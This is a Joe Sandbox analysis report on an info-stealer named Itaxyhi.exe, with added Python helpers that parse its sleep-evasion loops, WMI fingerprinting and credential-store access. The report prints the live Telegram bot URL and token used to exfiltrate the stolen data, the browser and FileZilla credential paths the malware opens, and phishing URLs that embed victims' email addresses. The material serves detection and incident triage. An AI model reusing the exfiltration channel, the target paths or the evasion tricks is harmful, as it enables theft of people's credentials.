            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599215Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598050Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597780Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597441Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Itaxyhi.exe, 00000000.00000002.2152040764.0000000000D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWvice%SystemRoot%\system32\mswsock.dll" />
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeMemory allocated: page read and write | page guardJump to behavior
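The thread delays above have a characteristic shape: TID 5156 asks for 600000 ms (10 minutes), returns early and immediately asks again for slightly less, each request roughly 110 to 180 ms shorter than the last, so the thread re-arms for the time left to a fixed deadline instead of accepting the shortened sleep (the API Interceptor entry further down records the 32 Sleep calls the sandbox modified). The 922337203685477 ms delay on TID 1708 is TimeSpan.MaxValue expressed in milliseconds, an effectively infinite wait. The Python below is an added example, not part of the Joe Sandbox report or the sample: it parses "Thread sleep time" and "WMI Queries" lines in the report's two-column format, flags the re-sleep staircase and the infinite wait, and labels each WMI class queried with what anti-VM code normally fingerprints through it. The sample lines are constructed from the values on this page; the thresholds and the hint table are the author's, and the hint table also covers the Win32_DiskDrive and Win32_VideoController queries named in the signature list.

```python
"""Sleep-loop and WMI-fingerprint heuristics over Joe Sandbox behaviour lines.

Added example, not part of the report or the sample. Input lines are
constructed from the values shown on this page; the thresholds and the WMI
hint table are the author's.
"""
import re
from collections import defaultdict

# TimeSpan.MaxValue.Ticks (2**63 - 1) over 10_000 ticks per millisecond:
# the 922337203685477 ms delay in the report is an effectively infinite wait.
INFINITE_MS = (2**63 - 1) // 10_000

# The report prints the delay as a negative "s" value, but the number is
# milliseconds (600000 is the 10-minute sleep behind the ">= 3 min" signature).
SLEEP_RE = re.compile(r"TID: (\d+)\D*?Thread sleep time: -(\d+)s")
WMI_RE = re.compile(r"ExecQuery - (\S+) : SELECT \* FROM (\w+)")

# Constructed from the page: five of TID 5156's delays plus the other threads.
SAMPLE_SLEEP_LINES = r"""
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156 | Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156 | Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156 | Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156 | Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5932 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 1708 | Thread sleep time: -922337203685477s >= -30000s
""".strip().splitlines()

# Constructed from the page's WMI query lines.
SAMPLE_WMI_LINES = r"""
Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
""".strip().splitlines()

# What evasion code usually reads from each class (author's table).
WMI_HINTS = {
    "Win32_ComputerSystem": "Manufacturer/Model strings naming VMware, VirtualBox or Hyper-V",
    "Win32_Processor": "core count and CPU name; low counts are typical of sandboxes",
    "Win32_DiskDrive": "disk Model/SerialNumber; virtual disks are recognisable",
    "Win32_VideoController": "display adapter Name; virtual GPUs are recognisable",
    "AntivirusProduct": "installed AV products, read from root\\SecurityCenter2",
}


def parse_sleeps(lines):
    """Return {tid: [delay_ms, ...]} in report order."""
    per_thread = defaultdict(list)
    for line in lines:
        m = SLEEP_RE.search(line)
        if m:
            per_thread[int(m.group(1))].append(int(m.group(2)))
    return dict(per_thread)


def find_resleep_loops(per_thread, min_ms=60_000, max_step_ms=2_000, min_len=3):
    """Threads whose consecutive long sleeps each shrink by at most max_step_ms.

    A loop woken early by a sandbox that shortens Sleep() and re-arming for the
    time left to its deadline produces exactly this staircase; a thread that
    sleeps once and then works does not. Returns {tid: (first, last, length)}.
    """
    loops = {}
    for tid, delays in per_thread.items():
        run, best = delays[:1], []
        for prev, cur in zip(delays, delays[1:]):
            run = run + [cur] if cur >= min_ms and 0 < prev - cur <= max_step_ms else [cur]
            if len(run) > len(best):
                best = run
        if len(best) >= min_len and best[0] >= min_ms:
            loops[tid] = (best[0], best[-1], len(best))
    return loops


def find_infinite_waits(per_thread):
    """Threads that parked themselves with a TimeSpan.MaxValue sleep."""
    return sorted(tid for tid, delays in per_thread.items() if INFINITE_MS in delays)


def classify_wmi(lines):
    """Return {class: (namespace, hint)} for every WMI class the sample queried."""
    seen = {}
    for line in lines:
        m = WMI_RE.search(line)
        if m:
            namespace, cls = m.groups()
            seen[cls] = (namespace, WMI_HINTS.get(cls, "not in hint table"))
    return seen


if __name__ == "__main__":
    sleeps = parse_sleeps(SAMPLE_SLEEP_LINES)
    print("re-sleep loops:", find_resleep_loops(sleeps))
    print("infinite waits:", find_infinite_waits(sleeps))
    for cls, (ns, hint) in classify_wmi(SAMPLE_WMI_LINES).items():
        print(f"{ns}\\{cls}: {hint}")
```

Run against the full report the staircase detector returns a single entry for TID 5156 spanning 600000 down to 596562 ms, which is the whole "May sleep (evasive loops)" finding in one line; a sandbox that wants to get past this has to fake the elapsed time the loop reads back, not just shorten the sleep.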

HIPS / PFW / Operating System Protection Evasion

Source: Itaxyhi.exe, Evyvybyhyny.cs | Reference to suspicious API methods: LoadLibrary(Hebovacenibyrymat)
Source: Itaxyhi.exe, Evyvybyhyny.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, Fyfibynesohixeteh), typeof(T))
Source: Itaxyhi.exe, Isocyxorura.cs | Reference to suspicious API methods: Asegepipela.Kernel32.OpenProcess(Asegepipela.Ytelivynyhuciju.DuplicateHandle, bInheritHandle: true, (uint)Xyjateguvokikyjeg)
Source: C:\Users\user\Desktop\Itaxyhi.exe | Queries volume information: C:\Users\user\Desktop\Itaxyhi.exe VolumeInformation
Source: C:\Users\user\Desktop\Itaxyhi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Itaxyhi.exe, 00000000.00000002.2154041215.000000001CBC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
MITRE ATT&CK Matrix (counts in front of a technique name are the report's own signature counts for that cell)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Masquerading | 2 OS Credential Dumping | 241 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 251 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 2 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Obfuscated Files or Information | NTDS | 123 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label
Itaxyhi.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
Itaxyhi.exe | 100% | Joe Sandbox ML |
Itaxyhi.exe | 70% | Virustotal |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://ns.adobt/pg/ | 0% | Avira URL Cloud | safe
https://get.ge | 0% | Avira URL Cloud | safe
http://ns.ad0/g/im | 0% | Avira URL Cloud | safe
https://get.ge | 2% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
get.geojs.io | 172.67.70.233 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://get.geojs.io/v1/ip/geo.json | false | | high
https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://get.geojs.io | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://get.ge | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D25000.00000004.00000800.00020000.00000000.sdmp | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
https://get.geojs.io | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/TheDyer | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.adobt/pg/ | Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.ad0/g/im | Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument(United | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/webster480 | Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp | false | | high
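The "File opened" entries under Stealing of Sensitive Information (Chrome and Edge Login Data, Cookies and Web Data; Firefox cookies.sqlite and key4.db; FileZilla recentservers.xml and sitemanager.xml) and the api.telegram.org/bot<id>:<token>/sendDocument URL in the table above together describe the collection and exfiltration path: the credential stores are opened in place, and the result is posted as a document to a Telegram bot whose token is hard-coded in the binary. The Python below is an added triage helper, not part of the Joe Sandbox report or the sample: it maps each "File opened" line to the credential store it touches, and splits the Bot API URL into bot id, token and method so the bot can be reported and the token blocked without pasting the secret into tickets. The sample lines are constructed from the paths and URLs on this page; the classification table is the author's and also covers logins.json, which the page does not list but which key4.db exists to decrypt.

```python
"""Triage of credential-store access and the Telegram Bot API exfiltration URL.

Added example, not part of the report or the sample. Input lines are
constructed from the paths and URLs shown on this page; the classification
table is the author's.
"""
import re

# Chromium profiles keep their SQLite stores under "User Data\<profile>".
CHROMIUM_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\(?:Network\\)?"
    r"(Login Data|Cookies|Web Data)$")
CHROMIUM_FILES = {
    "Login Data": "saved usernames and passwords (encrypted with the key in Local State)",
    "Cookies": "session cookies (account takeover without the password)",
    "Web Data": "autofill entries and payment cards",
}
FIREFOX_RE = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key4\.db|logins\.json|cookies\.sqlite)$")
FIREFOX_FILES = {
    "key4.db": "NSS key database needed to decrypt logins.json",
    "logins.json": "saved logins, encrypted with the key4.db master key",
    "cookies.sqlite": "session cookies",
}
FILEZILLA_RE = re.compile(r"\\FileZilla\\(sitemanager\.xml|recentservers\.xml)$")
# Tolerates the report's two-column format and the raw "Jump to behavior" suffix.
FILE_OPENED_RE = re.compile(r"File opened: (.+?)(?:Jump to behavior)?\s*$")
TELEGRAM_BOT_RE = re.compile(r"https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")

# Constructed from the "File opened" rows on this page, plus one unrelated row.
SAMPLE_BEHAVIOR = r"""
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\Itaxyhi.exe | Queries volume information: C:\Users\user\Desktop\Itaxyhi.exe VolumeInformation
""".strip().splitlines()
# Constructed from the URL table on this page.
SAMPLE_URLS = [
    "https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument",
    "https://get.geojs.io/v1/ip/geo.json",
]


def classify_store(path):
    """Return (application, what the file holds), or None for an uninteresting path."""
    m = CHROMIUM_RE.search(path)
    if m:
        app = "Chrome" if m.group(1).startswith("Google") else "Edge"
        return app, CHROMIUM_FILES[m.group(2)]
    m = FIREFOX_RE.search(path)
    if m:
        return "Firefox", FIREFOX_FILES[m.group(1)]
    if FILEZILLA_RE.search(path):
        return "FileZilla", "FTP site credentials (base64 passwords unless a master password is set)"
    return None


def triage_file_access(lines):
    """Map every 'File opened' line to the credential store it touches."""
    hits = []
    for line in lines:
        m = FILE_OPENED_RE.search(line)
        if not m:
            continue
        path = m.group(1).strip()
        cls = classify_store(path)
        if cls:
            hits.append({"path": path, "app": cls[0], "data": cls[1]})
    return hits


def summarize(lines):
    """Count touched stores per application for a one-line triage headline."""
    counts = {}
    for hit in triage_file_access(lines):
        counts[hit["app"]] = counts.get(hit["app"], 0) + 1
    return counts


def parse_telegram_bot_url(url):
    """Split a Bot API URL into bot id, token and method; None if it is not one.

    The token is the attacker's credential for the exfiltration channel: share
    the bot id and the redacted form, keep the full token in the IOC store.
    """
    m = TELEGRAM_BOT_RE.search(url)
    if not m:
        return None
    bot_id, token, method = m.groups()
    return {"bot_id": bot_id, "token": token, "method": method,
            "token_redacted": token[:4] + "..." + token[-4:]}


if __name__ == "__main__":
    print(summarize(SAMPLE_BEHAVIOR))
    for url in SAMPLE_URLS:
        print(url.split("/bot")[0], parse_telegram_bot_url(url))
```

The method name is worth keeping: sendDocument means the loot leaves as a file attachment (an archive, given the "Archive Collected Data" cell in the matrix), so a proxy rule that only inspects Bot API sendMessage bodies would miss it.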
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
172.67.70.233 | get.geojs.io | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572892
Start date and time: 2024-12-11 07:31:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Itaxyhi.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/1@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 6
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:31:58 | API Interceptor | 32x Sleep call for process: Itaxyhi.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                          Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                            17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                  ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                            172.67.70.233rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                              gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                system.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                  upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                    DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                            https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
